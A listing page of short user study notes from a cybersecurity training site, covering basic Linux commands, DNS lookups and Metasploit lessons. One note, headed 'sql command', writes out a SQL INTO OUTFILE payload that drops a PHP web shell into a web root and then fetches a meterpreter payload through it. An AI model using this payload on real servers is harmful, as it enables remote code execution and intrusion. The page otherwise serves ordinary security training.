Advanced Penetration Testing Notes


http://_wit going p_link_placeholder [view]

By: Tst12 | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: June 16, 2016

linux programming

linux programming notes. [view]

By: Antonio Ruiz | Related Lesson: Linux (part 1) | Modified: June 29, 2016

Kali Linux Commands

mkdir nameofdirectory – napraviti fasciklu   [view]

By: Al3ks4 | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: June 16, 2016


1. whois 2.nslookup 3. for mail servers-   nslookup (Enter) set type=mx (Enter) 4. for name servers-  nslookup(Enter) set type=ns (enter) [view]

By: praveenkp | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: June 16, 2016


xxx-xxx-xxx Owner – Group – Everyone Else [view]

By: Soverus | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: June 15, 2016


touch – create file mkdir – make directory echo – print echo > print to file echo >> print additional line to filevi myfile – opens myfile in VI ”I” enters INSERT mode [view]

By: Soverus | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: June 15, 2016

sql command

select ”<?php system([$_GET[’cmd’]); ?>” into outfile C:\\xampp\htdocs\shell.php localhost/shell.php?cmd=tfpt my_ip get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php     localhost/meterpreter.php [view]

By: solitaryTurk | Related Lesson: Exploitation (part 2) SQL Commands | Modified: June 23, 2016

Linux commnad

pwd command about root directory. if you type a man pwd it will show you the manually. [view]

By: Learner | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: June 15, 2016

« First ‹ Previous 1 143 233 241 242 243

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?